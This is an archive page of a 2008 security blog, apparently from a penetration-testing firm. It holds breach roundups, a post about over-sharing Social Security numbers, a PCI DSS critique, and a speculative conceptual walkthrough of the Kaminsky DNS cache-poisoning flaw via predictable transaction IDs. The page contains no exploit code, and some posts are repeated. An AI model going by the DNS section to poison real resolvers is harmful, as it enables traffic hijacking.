Once again it’s time for the Lame Man’s View… only one story this week… and it’s a good one!
It comes to us from San Francisco. According to numerous reports on the web and on TV… The City of San Francisco has had several breaches and has spent most of their time notifying customers and citizens that their Social Security Numbers may have been compromised. Now this story is good in my eyes because of the way the City of San Francisco operates. This is a city that claims it is sovereign from the Federal Government and does not have to follow certain laws regarding harboring illegal aliens. I think the Federal Government should take this time to not provide aid in any form to the City of San Francisco to show them what it would really be like… were they actually sovereign.
http://youtube.com/watch?v=tisfvHviIGA
That’s all for this week… Catch me again next Friday…
Read more!
Friday, July 25, 2008
You want my what? Really.
They say that identity theft is a larger and more profitable business than drug trafficking.
I wonder why.
Hmmm, I don't know, maybe because EVERYONE HAS MY PERSONAL INFORMATION.
Help desk analyst I talked to recently:
"In order for me to help you, I'll need your Social Security Number."
My response: Really?
Person from certification body auditing my credentials:
"If you'll give me your Social Security Number, I might be able to save some time in collecting the information I need."
My response: Really?
Nurse at doctor's office that I spent all of 6 minutes at:
"I'll need all of your information filled out on this form, including your Social Security Number."
My response: Really.
Enough is enough. In the past 3 weeks, I've been asked for my Social Security Number by 7 people that I didn't know or inherently trust. Some of these people had legitimate reasons for asking for my info, but for others it was simply them wanting to "save some time".
As security professionals and evaluators of controls and procedures, we should be first to say, "Hey, how about we NOT ask for their SSN and maybe use other sources of info to verify their identity?"
I know what you're thinking.Wait, let ME say it. Social Security Numbers are one of the few reliable sources of personally identifiable information out there. I understand this. I just wonder why organizations worldwide use them so publicly and openly.
Bottom line: our Social Security Numbers shouldn't be the one and only source of information that we use to identify the people that interact with us. Organizations all over the world should be a little more creative with this process.
And to the people that GIVE this information so freely to the people that request it, all you need to do is say one word: "Why?" The organization or person should be able to answer this. If the response you're given makes your stomach hurt, just say: "Is there another piece of information that I can give you to identify me?" Most of the time there will be, and asking simple questions helps to limit the exposure in a number of ways.
Let me esplain...no wait, there is too much, let me sum up:
Read more!
I wonder why.
Hmmm, I don't know, maybe because EVERYONE HAS MY PERSONAL INFORMATION.
Help desk analyst I talked to recently:
"In order for me to help you, I'll need your Social Security Number."
My response: Really?
Person from certification body auditing my credentials:
"If you'll give me your Social Security Number, I might be able to save some time in collecting the information I need."
My response: Really?
Nurse at doctor's office that I spent all of 6 minutes at:
"I'll need all of your information filled out on this form, including your Social Security Number."
My response: Really.
Enough is enough. In the past 3 weeks, I've been asked for my Social Security Number by 7 people that I didn't know or inherently trust. Some of these people had legitimate reasons for asking for my info, but for others it was simply them wanting to "save some time".
As security professionals and evaluators of controls and procedures, we should be first to say, "Hey, how about we NOT ask for their SSN and maybe use other sources of info to verify their identity?"
I know what you're thinking.Wait, let ME say it. Social Security Numbers are one of the few reliable sources of personally identifiable information out there. I understand this. I just wonder why organizations worldwide use them so publicly and openly.
Bottom line: our Social Security Numbers shouldn't be the one and only source of information that we use to identify the people that interact with us. Organizations all over the world should be a little more creative with this process.
And to the people that GIVE this information so freely to the people that request it, all you need to do is say one word: "Why?" The organization or person should be able to answer this. If the response you're given makes your stomach hurt, just say: "Is there another piece of information that I can give you to identify me?" Most of the time there will be, and asking simple questions helps to limit the exposure in a number of ways.
Let me esplain...no wait, there is too much, let me sum up:
- If you're in a crowded area, and someone asked you to verbally give them your credit card number, would you do it? I hope not. Granted, the number of people that can memorize 12 to 16 digits after hearing them once is pretty limited, but you get my point.
- The majority of the time, call center operators that ask for anything related to your Social Security Number are only asking for the last 4 digits. Most of the time this is all that's visible to them on the monitor in front of them. If someone is asking for the full meal deal, take caution and again ask, "Why?".
- Stay on the side of caution when ANYONE asks for your SSN. Be cautious. Once you give it up, that's it. It's not like you can call American Express and ask them to issue you a new one.
Read more!
Labels:
identity theft,
SSN
Tuesday, July 22, 2008
The big DNS security hole hype exposed
Dan Kaminsky released a little bit ago a joint effort to fix a major and "critical" security flaw with multiple vendors regarding DNS. Dan had stated he was not going to release the vulnerability until his BlackHat speaking in July, but it appears it was already leaked.
DNS Cache Poisoning is nothing new, on July 22, 1999 Hillary Clinton's site was subject to DNS cache poisoning:
http://www.cnn.com/TECH/computing/9907/22/hillary.idg/
It appears that the vulnerability itself is due to predictable TXID's and the lack of port randomization in DNS. Based on TXID inspection (and the blog from Microsoft) it appears that the 4-8 bits are predictable and are able to determine the PRNG state and predict the TXID.
To fix DNS Cache Poisoning, the PRNG algorithm was applied to the TXID or transaction ID's. The vulnerability lies within TXID where the 4-8 bits are predictable allowing the attacker to predict the next TXID. Here's how the attack is suppose to work (hypothetically):
Attacker queries nameserverA for yahoo.com's IP address through DNS. nameserverA doesn't know the IP of yahoo.com. nameserverA goes to the root name servers and says wheres the listings for .com, nameserverA goes to the listings for all .com and looks for the authoritative DNS server for yahoo.com. After that the IP is resolved and you can browse normally to yahoo.com. Where the attack is performed is the request from nameserverA to the authoritative DNS server, when nameserverA sends a request to the root server, the root server sends back a "referral" which tells nameserverA where to go for the .com listings. Contained in this exchange of information is the TXID. It keeps going down the list to various DNS servers, ultimately to the authoritative DNS server.
Our guess at where the attack occurs is the response back from the root server to respond on where yahoo.com's server resides. If an attacker can spoof a valid TXID and say yahoo.com's nameserver is really at ns.badhacker.com and not ns.yahoo.com and ultimately resolves to 1.1.1.1 instead of 2.2.2.2, we can perform cache poisoning of that name server.
So initial speculations that this is bad is pretty accurate and why all the hush was kept to allow all vendors to patch the systems accordingly. Kudos goes out to Dan Kaminsky for taking all of the scrutiny over all of this and allowing vendors time to patch the systems to something that was in fact not just hype but could have major implications if exploited successfully.
I hope all of your DNS servers are patched, a POC should be pretty easy to write off of this.
Special thanks to Microsoft for releasing details about the patch and letting us know what the vulnerability was:
http://blogs.technet.com/swi/archive/2008/04/09/ms08-020-how-predictable-is-the-dns-transaction-id.aspx
Special thanks to John Melvin from SecureState for helping me out on this.
Again this is purely hypothetical, this hasn't been confirmed nor denied.
UPDATE: Update to this post, it appears that it has been confirmed and found by Halvar Flake blog. In addition matasano also discovered it but the site was put up temporarily and taken down when discovered, a mirrored site can be found at: http://beezari.livejournal.com/141796.html. Patch your servers folks!
PATCH: What the patch appears to do, pretty cut and dry, it makes the TXID truly random and randomizes the DNS ports pretty much making this attack useless.
Read more!
DNS Cache Poisoning is nothing new, on July 22, 1999 Hillary Clinton's site was subject to DNS cache poisoning:
http://www.cnn.com/TECH/computing/9907/22/hillary.idg/
It appears that the vulnerability itself is due to predictable TXID's and the lack of port randomization in DNS. Based on TXID inspection (and the blog from Microsoft) it appears that the 4-8 bits are predictable and are able to determine the PRNG state and predict the TXID.
To fix DNS Cache Poisoning, the PRNG algorithm was applied to the TXID or transaction ID's. The vulnerability lies within TXID where the 4-8 bits are predictable allowing the attacker to predict the next TXID. Here's how the attack is suppose to work (hypothetically):
Attacker queries nameserverA for yahoo.com's IP address through DNS. nameserverA doesn't know the IP of yahoo.com. nameserverA goes to the root name servers and says wheres the listings for .com, nameserverA goes to the listings for all .com and looks for the authoritative DNS server for yahoo.com. After that the IP is resolved and you can browse normally to yahoo.com. Where the attack is performed is the request from nameserverA to the authoritative DNS server, when nameserverA sends a request to the root server, the root server sends back a "referral" which tells nameserverA where to go for the .com listings. Contained in this exchange of information is the TXID. It keeps going down the list to various DNS servers, ultimately to the authoritative DNS server.
Our guess at where the attack occurs is the response back from the root server to respond on where yahoo.com's server resides. If an attacker can spoof a valid TXID and say yahoo.com's nameserver is really at ns.badhacker.com and not ns.yahoo.com and ultimately resolves to 1.1.1.1 instead of 2.2.2.2, we can perform cache poisoning of that name server.
So initial speculations that this is bad is pretty accurate and why all the hush was kept to allow all vendors to patch the systems accordingly. Kudos goes out to Dan Kaminsky for taking all of the scrutiny over all of this and allowing vendors time to patch the systems to something that was in fact not just hype but could have major implications if exploited successfully.
I hope all of your DNS servers are patched, a POC should be pretty easy to write off of this.
Special thanks to Microsoft for releasing details about the patch and letting us know what the vulnerability was:
http://blogs.technet.com/swi/archive/2008/04/09/ms08-020-how-predictable-is-the-dns-transaction-id.aspx
Special thanks to John Melvin from SecureState for helping me out on this.
Again this is purely hypothetical, this hasn't been confirmed nor denied.
UPDATE: Update to this post, it appears that it has been confirmed and found by Halvar Flake blog. In addition matasano also discovered it but the site was put up temporarily and taken down when discovered, a mirrored site can be found at: http://beezari.livejournal.com/141796.html. Patch your servers folks!
PATCH: What the patch appears to do, pretty cut and dry, it makes the TXID truly random and randomizes the DNS ports pretty much making this attack useless.
Read more!
Labels:
DNS,
dns poisoning,
exploit,
kaminsky,
ms08-020,
TXID,
vulnerability
PCI Compliance: Close but no cigar.
PCI Compliance is on almost everyone's mind and it will continue to grow in popularity as time progresses. Before I start, this is by no means a rant or flaming of the PCI DSS 1.1 standard, in fact, to date the PCI DSS is the most technical security framework really out there to date. There are a lot of positives toward the standard; however it has many shortcomings. I'm not going to list every one, but focus on some of the most pressing issues that we've seen as penetration testers and where the standard really is failing.
First, let’s start with: the standard should never be fully relied upon for organizations overall security posture. A matured security organization typically pulls from many standards like the ISO 27001/27002, NSA IAM, NIST, PCI, etc. One thing that this standard has really pulled through was a start to security in organizations and a start for security to be taken seriously. Generally, banks were the forefront for protecting data due to the sensitive nature of information, and most other organizations security fell in the wind and has since begun to shift in a different direction.
As a penetration tester, and running a team of gifted hackers, we get to see every environment and configuration known to man. Due to PCI's 11.3 "Performing penetration testing at least one a year", we do a variety of penetration testing assessments against PCI Compliant organizations. One of the most alarming statistics is our 63 percent success rate for breaching systems in PCI Compliant organizations. By breaching systems, we're talking about full access to the underlying operating system and potential to further penetrate into the network. The 63 percent doesn't even include access to the back-end databases, login bypasses, and various other issues we find during a pentest.
PCI's 1.1 states in 6.5 to use the OWASP guidelines for securing their systems. PCI 1.1 uses the OWASP 2004 framework for vulnerabilities, which is missing the good ol' malicious file execution amongst others. In addition to this, the ASV scans that need to be performed only check for XSS and SQL Injection. Vulnerability scanners, in general, are pretty rudimentary and basic in vulnerability identification, but only detecting two of the overall top ten is a major issue. In 6.6 a code review or WAF has to be in place, which should hopefully stop SOME of these attacks, but the alarming issue here is we've done successful penetration tests against sites that have undergone a code review, or have a WAF in place and do minor protection against attacks.
WAF are great (if properly configured), don't get me wrong, but they should not be the only layer of defense. Creating a security systems development life-cycle (SSDLC) from the beginning of development and through development and establishing code freezes for security testing before going into production is vital and the preferred method. Web applications have been getting a bum rap and are the major points of entry for external breaches to date. The standard simply states "Installing an application-layer firewall in front of web-facing applications", it does not state anything about allowing exceptions for functionality of the site (and introducing exposures) or hardening techniques. Again, the purpose of the standard was not to secure your systems for you, but at least give you a framework for organizations to implement security.
My next question on the DSS standard is who performs the code reviews looking for these common vulnerabilities? Most VARs have a penetration testing wing, generally consisting of two people that implement product and do penetration testing as a side job (oh and hey, if you buy this product it'll fix your vulnerabilities). These guys generally use tools that don't even touch the web application layer in depth and give false satisfactions and assurance to organizations. There’s no certification process for web applications assessors, it only states "an organization that specializes in application security", if I have Nessus does that make me a specialist in web application security? If I have AppScan, WebInspect, Ounce, Fortify, or any of the others in there, does running a tool make me a specialist?
My last main issue covers the ASV guidelines, quoted directly from the ASV scanning standard:
"Merchants and service providers have the ultimate responsibility for defining the scope of their PCI Security Scan, though they may seek expertise from ASVs for help. If an account data compromise occurs via an IP address or component not included in the scan, the merchant or service provider is responsible. "
We've run into many scenarios where organizations are using this loophole to take systems out of scope for the PCI assessment. While the organization is "responsible" if it becomes compromised, generally the companies we're seeing this as a way to pass the test without ever having any of the security restrictions on the system in place. So as per this statement, a main e-commerce site handling all credit card transactions for the organization can be taken out of scope by the merchant or service provider if they choose. At this point, what is the point in becoming compliant at all? Why study hard for a “C” when you can get an “A” every time without ever studying? “Sure if you get caught cheating its bad, but what’s the payoff, we're never going to get breached!”
To finalize the point I was trying to get out here is organizations are really using this to become "secure", when that really isn't the impact intended. In order for organizations to incorporate security, it has to be a widespread adoption within the organization, pull multiple frameworks and standards, and incorporate them into a regularly tested and updated programs. Relying solely on of PCI compliance and going through the checklist is not going to protect you from a breach by any means.
Read more!
First, let’s start with: the standard should never be fully relied upon for organizations overall security posture. A matured security organization typically pulls from many standards like the ISO 27001/27002, NSA IAM, NIST, PCI, etc. One thing that this standard has really pulled through was a start to security in organizations and a start for security to be taken seriously. Generally, banks were the forefront for protecting data due to the sensitive nature of information, and most other organizations security fell in the wind and has since begun to shift in a different direction.
As a penetration tester, and running a team of gifted hackers, we get to see every environment and configuration known to man. Due to PCI's 11.3 "Performing penetration testing at least one a year", we do a variety of penetration testing assessments against PCI Compliant organizations. One of the most alarming statistics is our 63 percent success rate for breaching systems in PCI Compliant organizations. By breaching systems, we're talking about full access to the underlying operating system and potential to further penetrate into the network. The 63 percent doesn't even include access to the back-end databases, login bypasses, and various other issues we find during a pentest.
PCI's 1.1 states in 6.5 to use the OWASP guidelines for securing their systems. PCI 1.1 uses the OWASP 2004 framework for vulnerabilities, which is missing the good ol' malicious file execution amongst others. In addition to this, the ASV scans that need to be performed only check for XSS and SQL Injection. Vulnerability scanners, in general, are pretty rudimentary and basic in vulnerability identification, but only detecting two of the overall top ten is a major issue. In 6.6 a code review or WAF has to be in place, which should hopefully stop SOME of these attacks, but the alarming issue here is we've done successful penetration tests against sites that have undergone a code review, or have a WAF in place and do minor protection against attacks.
WAF are great (if properly configured), don't get me wrong, but they should not be the only layer of defense. Creating a security systems development life-cycle (SSDLC) from the beginning of development and through development and establishing code freezes for security testing before going into production is vital and the preferred method. Web applications have been getting a bum rap and are the major points of entry for external breaches to date. The standard simply states "Installing an application-layer firewall in front of web-facing applications", it does not state anything about allowing exceptions for functionality of the site (and introducing exposures) or hardening techniques. Again, the purpose of the standard was not to secure your systems for you, but at least give you a framework for organizations to implement security.
My next question on the DSS standard is who performs the code reviews looking for these common vulnerabilities? Most VARs have a penetration testing wing, generally consisting of two people that implement product and do penetration testing as a side job (oh and hey, if you buy this product it'll fix your vulnerabilities). These guys generally use tools that don't even touch the web application layer in depth and give false satisfactions and assurance to organizations. There’s no certification process for web applications assessors, it only states "an organization that specializes in application security", if I have Nessus does that make me a specialist in web application security? If I have AppScan, WebInspect, Ounce, Fortify, or any of the others in there, does running a tool make me a specialist?
My last main issue covers the ASV guidelines, quoted directly from the ASV scanning standard:
"Merchants and service providers have the ultimate responsibility for defining the scope of their PCI Security Scan, though they may seek expertise from ASVs for help. If an account data compromise occurs via an IP address or component not included in the scan, the merchant or service provider is responsible. "
We've run into many scenarios where organizations are using this loophole to take systems out of scope for the PCI assessment. While the organization is "responsible" if it becomes compromised, generally the companies we're seeing this as a way to pass the test without ever having any of the security restrictions on the system in place. So as per this statement, a main e-commerce site handling all credit card transactions for the organization can be taken out of scope by the merchant or service provider if they choose. At this point, what is the point in becoming compliant at all? Why study hard for a “C” when you can get an “A” every time without ever studying? “Sure if you get caught cheating its bad, but what’s the payoff, we're never going to get breached!”
To finalize the point I was trying to get out here is organizations are really using this to become "secure", when that really isn't the impact intended. In order for organizations to incorporate security, it has to be a widespread adoption within the organization, pull multiple frameworks and standards, and incorporate them into a regularly tested and updated programs. Relying solely on of PCI compliance and going through the checklist is not going to protect you from a breach by any means.
Read more!
Labels:
compliance,
hacking,
iam,
iso,
nist,
nsa,
pci,
pci compliance,
penetration,
penetration testing,
Security
The Lame Man's Perspective
The Lame Man delves into the security breaches/stories for the past week and reveals the Good (attempt to find the good), Bad and oh so Ugly.
Good… Security breaches aren’t good… people lose their information, have the threat of identity theft, lose money and the all the other things that come along. But this story out of DC gets the pat on the back for the week. According to the Washington Post, the Social Security numbers of almost 4700 current and former Metro employees were posted on the agency’s website last month. It was a mistake made when the transit authority was soliciting possible workers’ comp. and risk management vendors. The good part of the breach comes here… Metro suspended the three workers responsible for the incident for one month without pay. It’s always good to hear that someone is being punished for their lack of common sense.
Bad… LPL Financial. The Boston-based broker-dealer reported that they began to take several steps to increase their data protection. This, after being breached for the second time in less than one year! The article, written in Investment News , says that the steps LPL is taking (since its first breach last July) to “beef up” its security includes: increasing the profile of data security within the company at all level, hiring a chief security/privacy officer and implementing a new information privacy and security program. Something tells me this plan isn’t working…
And the Ugly for this week comes from Washington and the Washington Education Association’s website which was brought down by Turkish hackers. Now, according to seattlepi.com, the attack brought down several local teachers’ union affiliates. It goes on to say that the attack did not compromise any personal data… but the reason why this goes on as the ugly story for the week is that the association is still having problems, one month later! Oh and they still proudly display Hackers 1, WEA 0.
Read more!
Good… Security breaches aren’t good… people lose their information, have the threat of identity theft, lose money and the all the other things that come along. But this story out of DC gets the pat on the back for the week. According to the Washington Post, the Social Security numbers of almost 4700 current and former Metro employees were posted on the agency’s website last month. It was a mistake made when the transit authority was soliciting possible workers’ comp. and risk management vendors. The good part of the breach comes here… Metro suspended the three workers responsible for the incident for one month without pay. It’s always good to hear that someone is being punished for their lack of common sense.
Bad… LPL Financial. The Boston-based broker-dealer reported that they began to take several steps to increase their data protection. This, after being breached for the second time in less than one year! The article, written in Investment News , says that the steps LPL is taking (since its first breach last July) to “beef up” its security includes: increasing the profile of data security within the company at all level, hiring a chief security/privacy officer and implementing a new information privacy and security program. Something tells me this plan isn’t working…
And the Ugly for this week comes from Washington and the Washington Education Association’s website which was brought down by Turkish hackers. Now, according to seattlepi.com, the attack brought down several local teachers’ union affiliates. It goes on to say that the attack did not compromise any personal data… but the reason why this goes on as the ugly story for the week is that the association is still having problems, one month later! Oh and they still proudly display Hackers 1, WEA 0.
Read more!
Subscribe to:
Posts (Atom)